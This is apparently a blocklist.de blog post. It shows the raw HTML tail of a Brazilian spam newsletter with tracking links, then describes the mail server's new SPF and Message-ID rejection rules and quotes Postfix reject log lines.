os ser&atilde;o entregues de segunda a s&aacute;bado em hor&aacute;rio come=
rcial.<br /> O frete &eacute; gr&aacute;tis para pedidos acima de R$ 299,00=
.</font></font></td>=0A<td width=3D"300" align=3D"center" valign=3D"top" bg=
color=3D"#FFFFFF"><font style=3D"font-family: Arial, Helvetica, sans-serif;=
 font-size: 11px; color: #636363;"><br /> <font style=3D"color: #503a5d;">P=
AGAMENTO</font><br /> <br /> Aceitamos pagamento por Boleto Banc&aacute;rio=
 ou por Cart&atilde;o<br /> de Cr&eacute;dito (Visa, Mastercard, Diners, Am=
ex, Elo e Discover) em at&eacute; 10x sem juros. Todas as formas de pagamen=
to<br /> tamb&eacute;m est&atilde;o dispon&iacute;veis no Televendas (47) 3=
390-5503. <br /> <font style=3D"color: #503a5d;"><br /> CONTATO</font> <br =
/> <br /> Para enviar suas d&uacute;vidas, sugest&otilde;es ou coment&aacut=
e;rios, contate-nos atraves do Telefone: (47) 3390-5503 |<br /> Chat: acess=
e <a style=3D"color: #503a5d;" href=3D"http://hiperlux.com.br/media/tl.php?=
p=3Ds5/u4/rs/21vc/sc/rs//http%3A%2F%2Fe2e.neoassist.com%2F%3Faction%3Dneoli=
ve%26scr%3Drequest%26th%3Dtritonnovo%26ForcaAutenticar%3D1%26UMail%3D%26ema=
il%3D%26name%3D%26uName%3D%3D" target=3D"_blank">aqui</a> | Email: contato@=
e2e.com.br<br /> Nosso hor&aacute;rio de atendimento &eacute; de segunda &a=
grave; sexta-feira<br /> das 8 &agrave;s 17h, (exceto feriados). <br /> <br=
 /> <font style=3D"color: #503a5d;">PRE&Ccedil;O</font><br /> <br /> O pre&=
ccedil;o dos produtos podem sofrer altera&ccedil;&otilde;es sem aviso pr&ea=
cute;vio. Caso haja diverg&ecirc;ncia do pre&ccedil;o da loja virtual com o=
 da newsletter, o valor a considerar ser&aacute; o da loja. </font></td>=0A=
</tr>=0A</tbody>=0A</table>=0A<br />=0A<table border=3D"0" align=3D"center"=
 cellpadding=3D"0" cellspacing=3D"0" style=3D"width: 600px;">=0A<tbody>=0A<=
tr>=0A<td><a href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/=
sc/rs/Rodape/http%3A%2F%2Fwww.triton.com.br%2F" title=3D"Rodape" target=3D"=
_blank"><img style=3D"display: block;" border=3D"0" src=3D"http://www.e2e.c=
om.br/E/20140318_Triton/images/img_20.jpg" alt=3D"Rodape" width=3D"600" hei=
ght=3D"66" /></a></td>=0A</tr>=0A</tbody>=0A</table>=0A<p style=3D"text-ali=
gn: center;"><a href=3D"http://hiperlux.com.br/media/u.php?p=3Ds5/rs/21vc/s=
c/u4/rs/rt">Se nao quiser mais receber esses emails acesse aqui</a></p>=0A=
=0A=0A<img src=3D"http://hiperlux.com.br/media/to.php?p=3Ds5/u4/rs/21vc/sc/=
rs" width=3D"5" height=3D"2" alt=3D".">=0A=0A</body>=0A</html>

--b1_ee5e6dfa82664ef97b3debab3faf58ca--

So, we reject now all Mails which has no spf-Records and sent a Mail to postmaster@ or have a X-MESSAGE-ID

The most Mails was now reject because there has no spf-record or false, are listen in spamhaus.org or a header-map entry matcht:

Mar 20 07:08:07 smtp-mx postfix/smtpd[15898]: NOQUEUE: reject: RCPT from unknown[201.73.148.20]: 550 5.7.1 <postmaster@blocklist.de>: Recipient address rejected: Please see http://www.openspf.org/Why?s=mfrom;id=dafiti%40gvgvv.com.br;ip=201.73.148.20;r=smtp-mx.blocklist.de; from=<dafiti@gvgvv.com.br> to=<postmaster@blocklist.de> proto=SMTP helo=<jmendes.com.br>

Mar 20 07:08:10 smtp-mx postfix/smtpd[15561]: NOQUEUE: reject: RCPT from unknown[201.30.165.34]: 554 5.7.1 Service unavailable; Client host [201.30.165.34] blocked using sbl-xbl.spamhaus.org; http://www.spamhaus.org/query/bl?ip=201.30.165.34; from=<bounce-30644-12669464-5960-248@bangmax.com.br> to=<postmaster@blocklist.de> proto=SMTP helo=<embrasil.com.br>

Mar 20 07:08:58 smtp-mx postfix/cleanup[15929]: 976F8D5943F85: reject: header Message-ID: <ee5e6dfa82664ef97b3debab3faf58ca@localhost.localdomain> from unknown[186.215.253.93]; from=<bounce-2696-19326188-4124-248@hiperlux.com.br> to=<postmaster@blocklist.de> proto=SMTP helo=<irmadulce.org.br>: 5.7.1 NOQUEUE: reject: This Message is not allowed here

-google-ads-
Translate »